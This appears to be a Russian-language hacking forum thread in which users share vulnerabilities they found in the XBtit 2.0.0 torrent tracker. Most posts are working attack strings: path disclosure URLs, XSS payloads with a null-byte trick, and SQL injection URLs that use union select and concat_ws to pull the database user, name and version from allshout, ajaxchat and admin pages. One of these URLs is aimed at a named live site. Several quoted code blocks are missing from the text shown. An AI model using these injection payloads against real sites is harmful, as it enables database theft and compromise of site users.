![]() |
Торрент трекер XBtit
Сёдня начал рыться в исходниках.
И так. Было иследованно на: Xbtit 2.0.0 Раскрытие путей. Цитата:
PHPSESSIONID раскрытие путей. В куках Цитата:
XSS Цитата:
Оло, через ошибку можно =\ Цитата:
Цитата:
PHP код:
Цитата:
Код:
#!/usr/bin/perl Меняем Avatar(Url) на: // Здесь этот пробел отфильтровал форум. Берём здесь http://ha.ckers.org/xss.html#XSS_Embedded_tab Как бы надо хоть как javascript заменять на что-то подобное :) Суть такова, что в конце обязательно нужен .gif,.jpg,.bmp или .png Но если делать в <IMG src='javascript:alert();.gif'> То код выполняться небудет, обычным нулл байтом прокатило :) Вообшем в модуле форум (не смф, а родной Xbtit'овский) при создании темы / сообщения, XSS срабатывает :) Надо что-бы торренты были открыты для публичного просмотра ) |
Требуются права админа :(
SQL-inj index.php?page=admin&user=2&code=8355071'&do=prune u SQL-inj Наврал , :) права пользователя нужны index.php?page=allshout&sid=1'&edit index.php?page=allshout&sid=1'&delete уязвимый код : Код:
$sid = isset($_GET["sid"])?$_GET["sid"]:0; # get shout id (sid)and set it to zero for boolКод:
http://lampmaster.dk/index.php?page=allshout&sid=1'&editКод:
$sid = isset($_GET["sid"])?(int)$_GET["sid"]:0; # get shout id (sid)and set it to zero for boolindex.php?page=allshout&sid=1+and+substring(versio n(),1,1)=5/*&edit Раскрытие путей если создан хоть один топик в форуме index.php?page=forum&action=viewforum&forumid[]= index.php?page=forum&action=viewtopic&topicid[]= |
Цитата:
|
Код:
$sid = isset($_GET["sid"])?$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool |
Какой запрос пытаешься передать? Посмотри фильтруется ли выше $_GET["sid"], или вообще массив $_GET.
|
про sid
if (isset($_GET["sid"])) { $sid = intval($_GET["sid"]); # getting shout id (sid) но там $sid = intval($_GET["sid"]); a He $_GET['sid'] = intval($_GET["sid"]); нету :) не фильтрует 3anpoc index.php?page=allshout&sid=1+order+by+6/*&delete => index.php?page=allshout&sid=1+order+by+5/*&delete => index.php?page=allshout&sid=1+union+select+1,2,3,4 ,5/*&delete мне тут уже он выдает ( у меня ошибку)а на одном сайте просто кидает на индекс.пхп :) |
Цитата:
т.е. только цифры. PS. В асю напиши, у меня там кое где есть исчо одна бага. |
по сути инклуд)))
при register_glodals = on index.php?page=recover&THIS_BASEPATH=' PHP код:
index.php?page=admin&user=2&code=835507&do=logview &THIS_BASEPATH=1' PHP код:
|
Расскрытие путей: /ajaxchat/sendChatData.php
Уязвимый кусок кода: PHP код:
Код:
Notice: Undefined variable: X in [PATH]Код:
/ajaxchat/sendChatData.php?n=123\&c=,concat_ws(0x3a,user(),database(),version()),7)/*&u=2Уязвимый кусок кода: PHP код:
Код:
/ajaxchat/sendChatData.php?n=NAME\&c=,concat_ws(0x3a,user(),database(),version()),2)/*&u=2Код:
INSERT INTO {$TABLE_PREFIX}chat (time,name,text,uid) VALUES Blind SQL-инъекция. Необходимы права админа. Код:
/index.php?page=admin&user=2&code=134469&do=category&action=edit&id=5 and substring(version(),1)=5PHP код:
Код:
/index.php?page=admin&user=2&code=134469&do=style&action=edit&id=1+and+substring(version(),1)=5PHP код:
Код:
/index.php?page=edit&info_hash=HASHID&returnto=index.php";alert(/hello+world/);<!--Код:
/include/functions.phpPHP код:
Код:
/edit.phpPHP код:
Код:
http://127.0.0.1/dev/ajaxchat/sendChatData.php?n=NAME&c=TEXT&u=UIDPHP код:
ЗЫ: Сам не ожидал, что столько найду, напишу, о_О. |
Cоздаeм нагрузку на сервер
При register_globals = On /index.php?GLOBALS["charset"]= |
| Время: 06:34 |